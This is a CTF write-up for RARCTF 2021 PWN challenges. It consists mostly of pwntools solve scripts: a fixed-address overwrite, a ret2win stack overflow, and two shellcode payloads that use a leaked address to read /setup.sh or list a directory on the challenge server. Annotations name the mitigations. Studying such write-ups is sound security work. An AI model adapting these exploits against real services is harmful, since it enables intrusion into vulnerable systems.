CTF-Writeup
RARCTF 2021
Rasser
2021. 8. 10. 22:29
PWN

from pwn import *
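# Solve script for the first PWN challenge: answer the yes/no prompt, then
# send one fixed 16-character hex string at the "shoot?" prompt.
# Prompts and payload are bytes literals so pwntools performs no implicit
# str -> bytes encoding on Python 3 (they are plain str on Python 2).
p = remote('193.57.159.27', 43092)

# Not referenced again below. The payload's trailing digits "04068" match the
# low digits of this value; how the service interprets the line is not shown
# on this page -- presumably it is parsed as a 64-bit hex number
# (TODO confirm against the binary).
code = 0x404068

p.sendlineafter(b'no]:', b'yes')

payload = b"fffffffffff04068"
# NOTE(review): the script relies on a fixed address, which is only stable
# when the binary is not position-independent. Building with PIE and
# range-checking the user-supplied value on the service side would remove
# what this script depends on.
p.sendlineafter(b'shoot?\n', payload)
p.interactive()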

from pwn import *
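# Solve script for the second PWN challenge (binary name taken from the
# commented-out local run below): 0x28 filler bytes followed by one packed
# 64-bit address, sent at the "access:" prompt.
#p = process('./ret2winrars')
p = remote('193.57.159.27', 30527)

# Fixed code address appended after the filler. Presumably the function that
# prints the flag -- TODO confirm in the binary's symbol table.
flag = 0x401166

# The filler must be bytes: p64() returns bytes, and on Python 3 the original
# str + bytes concatenation raises TypeError. Behaviour on Python 2 is
# unchanged.
payload = b"A" * 0x28
payload += p64(flag)  # 8 bytes, little-endian by pwntools default

# NOTE(review): 0x28 bytes reaching a control-flow-relevant slot implies the
# service reads more input than its buffer holds (presumably buffer plus saved
# frame pointer -- confirm). A bounded read fixes the root cause; a stack
# canary and PIE are the build-time mitigations that would stop a fixed
# address overwrite like this one.
p.sendlineafter(b'access:', payload)
p.interactive()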

제일 삽질한 문제
파일 이름이 플래그이며, setup.sh를 보거나 디렉터리 전체를 출력하는 코드를 사용하여 확인할 수 있음
from pwn import *
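# Solve script, variant 1, for the "notsimple" challenge: read the address the
# service prints after "leaking! ", then send assembled code that dumps
# /setup.sh to stdout, padded to 88 bytes and followed by the leaked address.
p = remote('193.57.159.27',35316)
#p = process('./notsimple')
e = ELF('./notsimple')  # `e` is not referenced again in this script
context(arch='amd64', log_level='DEBUG')
#gdb.attach(p)

# The service prints a hex address on the line following "leaking! ".
# [:-1] drops the trailing newline before parsing.
p.recvuntil(b'leaking! ')
leak_addr = int(p.recvline()[:-1], 16)
print('leak_addr: ' + hex(leak_addr))

# Assembly source is built as text first and assembled once. No shell is
# spawned: the code opens /setup.sh, reads up to 10000 bytes into the memory
# at rsp, writes the same number of bytes to fd 1 and exits.
shellcode = shellcraft.open('/setup.sh')
shellcode += shellcraft.read('rax', 'rsp', 10000)  # rax holds the fd returned by open
shellcode += shellcraft.write('1', 'rsp', 10000)
shellcode += shellcraft.exit()
shellcode = asm(shellcode)

# Pad with 0x90 (NOP) up to offset 88, then append the leaked address. The
# pad byte must be bytes: asm() and p64() return bytes, so the original
# "\x90" str literal raises TypeError on Python 3. ljust() adds no padding
# when the code is already 88 bytes or longer, as the original
# multiplication by a non-positive count did.
payload = shellcode.ljust(88, b"\x90")
payload += p64(leak_addr)

# NOTE(review): presumably offset 88 is the saved return address and the
# leaked value is the address of the input buffer -- confirm in the binary.
# If so, the service combines three weaknesses: an unbounded read, an
# executable stack, and an address disclosure. A non-executable stack (NX) or
# removing the leak would each be enough to stop this input from running.
p.sendlineafter(b'> ', payload)
p.interactive()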
from pwn import *
import os
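# Solve script, variant 2, for the same service and port as variant 1: instead
# of reading a file it lists the current directory, because (per the write-up)
# the flag is the name of a file.
p = remote('193.57.159.27',35316)
context(arch='amd64', log_level='DEBUG')

# The service prints a hex address on the line following "leaking! ".
# [:-1] drops the trailing newline before parsing.
p.recvuntil(b'leaking! ')
leak_addr = int(p.recvline()[:-1], 16)
print('leak_addr: ' + hex(leak_addr))

# Repoint rsp at the pointer stored at fs:[0] before using rsp as a scratch
# buffer. Presumably this keeps the 0x500-byte getdents output from landing on
# the injected code itself -- TODO confirm.
shellcode = asm('mov rsp, QWORD PTR fs:[0]')
shellcode += asm(shellcraft.open('.'))
# fd 3 is hard-coded: assumes open('.') returned the first descriptor after
# stdin/stdout/stderr -- verify against the target process.
shellcode += asm(shellcraft.getdents(3, 'rsp', 0x500))
shellcode += asm(shellcraft.write(1, 'rsp', 0x500))  # raw dirent records to stdout

# Pad with 0x90 (NOP) up to offset 88, then append the leaked address. The
# pad byte must be bytes: asm() and p64() return bytes, so the original
# "\x90" str literal raises TypeError on Python 3. ljust() adds no padding
# when the code is already 88 bytes or longer, as the original
# multiplication by a non-positive count did.
payload = shellcode.ljust(88, b"\x90")
payload += p64(leak_addr)

# NOTE(review): besides the memory-safety issues (unbounded read, executable
# stack, address leak -- presumed, confirm in the binary), this variant shows
# that storing a secret in a file *name* exposes it to anything able to list
# the directory, even where reading file contents is restricted.
p.sendlineafter(b'> ', payload)
p.interactive()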